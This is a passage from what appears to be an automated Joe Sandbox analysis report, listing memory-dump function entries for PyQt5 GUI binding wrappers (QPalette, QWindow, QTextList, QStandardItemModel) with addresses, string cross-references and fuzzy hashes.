fill, xrefs: 00007FFB9A2E39E1
BJ9|i, xrefs: 00007FFB9A2E3979

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?fill@?$Point@@Point@@@@Vector@
String ID: BJ9|i$QPolygon$fill$fill(self, value: QPoint, size: int = -1)
API String ID: 4025833221-2906954916
Opcode ID: a67caa17e82b44df6a525373bbc4b926246a952906db9cc83f5d07c85412aa25
Instruction ID: 0a7cbdba9ac51975d5bf0637dd630c32483855799a92cf7e334200414c5742c9
Opcode Fuzzy Hash: a67caa17e82b44df6a525373bbc4b926246a952906db9cc83f5d07c85412aa25
Instruction Fuzzy Hash: D0210976B18F56C1EB608F25E8882A933B8FB49790F914176CAAD43760DF3DD959C700

Function 00007FFB9A303990 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setName@QTouchDevice@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFB9A303A00

Strings

QTouchDevice, xrefs: 00007FFB9A303A5A
setName, xrefs: 00007FFB9A303A53
BJ1, xrefs: 00007FFB9A3039A5
setName(self, name: Optional[str]), xrefs: 00007FFB9A303A47

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setDevice@@Name@String@@@Touch
String ID: BJ1$QTouchDevice$setName$setName(self, name: Optional[str])
API String ID: 276416834-2037791626
Opcode ID: 6014710a04d3315eccbcbe7d4048e30585a7252428fcd225f511147842726a59
Instruction ID: 5def6c98e6b6f7f344416ddcd76b0cb4b3a597ad9605c295958764a7616f7e23
Opcode Fuzzy Hash: 6014710a04d3315eccbcbe7d4048e30585a7252428fcd225f511147842726a59
Instruction Fuzzy Hash: 5921C2B6A08B5681EB609F25E8885A933B8FB49B80F9181B6CE9D43720DF79D549C740

Function 00007FFB9A32DEC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFB9A32DF28
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A32DF34

Strings

base, xrefs: 00007FFB9A32DF71
base(self) -> QBrush, xrefs: 00007FFB9A32DF65
QPalette, xrefs: 00007FFB9A32DF78

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: QPalette$base$base(self) -> QBrush
API String ID: 868068763-3618895797
Opcode ID: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
Instruction ID: 501b9b2c4c1b961a78ae2e2540258de5d0ae6008480129c886cb8dc645afd8c1
Opcode Fuzzy Hash: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
Instruction Fuzzy Hash: 481128B5B18B8681EB60DF21E8887A937A8FB95B84FA140B6DE4D07320DF7DD549C740

Function 00007FFB9A32DB40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFB9A32DBA8
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A32DBB4

Strings

text(self) -> QBrush, xrefs: 00007FFB9A32DBE5
QPalette, xrefs: 00007FFB9A32DBF8
text, xrefs: 00007FFB9A32DBF1

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: QPalette$text$text(self) -> QBrush
API String ID: 868068763-2773970170
Opcode ID: 1199e82a74767107699b8b3867134bb85bed704959f74e5e7127ce58e4918856
Instruction ID: 37346ee23f9049aef978acc97dfa197fc882506422341481ac0974aed8523f97
Opcode Fuzzy Hash: 1199e82a74767107699b8b3867134bb85bed704959f74e5e7127ce58e4918856
Instruction Fuzzy Hash: 02116DB5B18B8681EB60CF21E8487A937A8FB85B84FA140B6CE4D07320DF7DD549C740

Function 00007FFB9A2E1F10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON

Download Yara Rule

APIs

?beginInsertColumns@QAbstractItemModel@@IEAAXAEBVQModelIndex@@HH@Z.QT5CORE ref: 00007FFB9A2E1F93

Strings

beginInsertColumns, xrefs: 00007FFB9A2E1FC2
QStandardItemModel, xrefs: 00007FFB9A2E1FC9
beginInsertColumns(self, parent: QModelIndex, first: int, last: int), xrefs: 00007FFB9A2E1FB6
BJ9ii, xrefs: 00007FFB9A2E1F37

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?beginAbstractColumns@Index@@InsertItemModelModel@@
String ID: BJ9ii$QStandardItemModel$beginInsertColumns$beginInsertColumns(self, parent: QModelIndex, first: int, last: int)
API String ID: 4214563904-3799555195
Opcode ID: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
Instruction ID: 7d710888da1e36f55b8ae37c25513bcf2e47e9468261d5622c612b57fc99bd24
Opcode Fuzzy Hash: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
Instruction Fuzzy Hash: 1E21F4B6B18B5A80EB208F61E8886A933A8FB48B84F614176CA5C07720DF79D959C740

Function 00007FFB9A2D3B10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?itemText@QTextList@@QEBA?AVQString@@AEBVQTextBlock@@@Z.QT5GUI ref: 00007FFB9A2D3B80

Strings

itemText, xrefs: 00007FFB9A2D3BB8
BJ9, xrefs: 00007FFB9A2D3B36
QTextList, xrefs: 00007FFB9A2D3BBF
itemText(self, a0: QTextBlock) -> str, xrefs: 00007FFB9A2D3BAC

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?itemBlock@@@List@@String@@Text@malloc
String ID: BJ9$QTextList$itemText$itemText(self, a0: QTextBlock) -> str
API String ID: 1711211281-3233298988
Opcode ID: 1b33ffd87ba07bb60495c6d2b5df045d12916c0eb9535c335cbae52a3c64bd32
Instruction ID: 58c8a1951f389ee54f55480dae0d53713063201d8c73ee76e22ee700f8d060dd
Opcode Fuzzy Hash: 1b33ffd87ba07bb60495c6d2b5df045d12916c0eb9535c335cbae52a3c64bd32
Instruction Fuzzy Hash: 1B112BB5B18F46C1EB10DF25E8886A933A9FB59B84FA140B6CA4C03320DF3DE949C740

Function 00007FFB9A30BB60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?mapFromGlobal@QWindow@@QEBA?AVQPoint@@AEBV2@@Z.QT5GUI ref: 00007FFB9A30BBD0

Strings

mapFromGlobal(self, pos: QPoint) -> QPoint, xrefs: 00007FFB9A30BBFC
mapFromGlobal, xrefs: 00007FFB9A30BC08
BJ9, xrefs: 00007FFB9A30BB86
QWindow, xrefs: 00007FFB9A30BC0F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?mapFromGlobal@Point@@V2@@Window@@malloc
String ID: BJ9$QWindow$mapFromGlobal$mapFromGlobal(self, pos: QPoint) -> QPoint
API String ID: 758699921-1033894547
Opcode ID: 3617b761648dacb152f3fb6bfc4bed94e73d2d5924613efb55997b5588de2465
Instruction ID: c7f150db1f7e85236f3fcdb3382adf5b271493f493756bfa804254f53b5cb306
Opcode Fuzzy Hash: 3617b761648dacb152f3fb6bfc4bed94e73d2d5924613efb55997b5588de2465
Instruction Fuzzy Hash: 7F111CB5B18F46C1EB50DF25E8886A933A8FB59B84F6140B6CA5C03320DF3DD549C740

Function 00007FFB9A2D1C00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?intersected@QPolygonF@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FFB9A2D1C69

Strings

QPolygonF, xrefs: 00007FFB9A2D1CA8
BJ9, xrefs: 00007FFB9A2D1C2E
intersected(self, r: QPolygonF) -> QPolygonF, xrefs: 00007FFB9A2D1C95
intersected, xrefs: 00007FFB9A2D1CA1

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?intersected@PolygonV1@@malloc
String ID: BJ9$QPolygonF$intersected$intersected(self, r: QPolygonF) -> QPolygonF
API String ID: 991172726-2371428186
Opcode ID: 28c92a7a63e5d6a103c88df67a1b41abedc2c5ba89578f73d96caa2a719bab15
Instruction ID: f100fcad4d8c0a10da9c6bdf80eaeb02085cb1fdc619aef3c42110fe1a6b37a9
Opcode Fuzzy Hash: 28c92a7a63e5d6a103c88df67a1b41abedc2c5ba89578f73d96caa2a719bab15
Instruction Fuzzy Hash: 311128B5B18B46C1EB10DF65E8896A933A8FB55B84FA140B6CA4C43320DF3DD949C740

Function 00007FFB9A2F1C70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

?setVerticalHeaderItem@QStandardItemModel@@QEAAXHPEAVQStandardItem@@@Z.QT5GUI ref: 00007FFB9A2F1CE2

Strings

setVerticalHeaderItem(self, row: int, item: Optional[QStandardItem]), xrefs: 00007FFB9A2F1D05
BiJ:, xrefs: 00007FFB9A2F1C96
QStandardItemModel, xrefs: 00007FFB9A2F1D1B
setVerticalHeaderItem, xrefs: 00007FFB9A2F1D14

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Standard$?setHeaderItemItem@Item@@@Model@@Vertical
String ID: BiJ:$QStandardItemModel$setVerticalHeaderItem$setVerticalHeaderItem(self, row: int, item: Optional[QStandardItem])
API String ID: 1702680858-2901156415
Opcode ID: 4bcbfa0ab82216598930bae98268b807b94918e2fb6a0126878742ddc6a421d1
Instruction ID: a7e1be9f739c6fafcde6098433d6950b5b7be4a8a95ed9d288fd2028326edab5
Opcode Fuzzy Hash: 4bcbfa0ab82216598930bae98268b807b94918e2fb6a0126878742ddc6a421d1
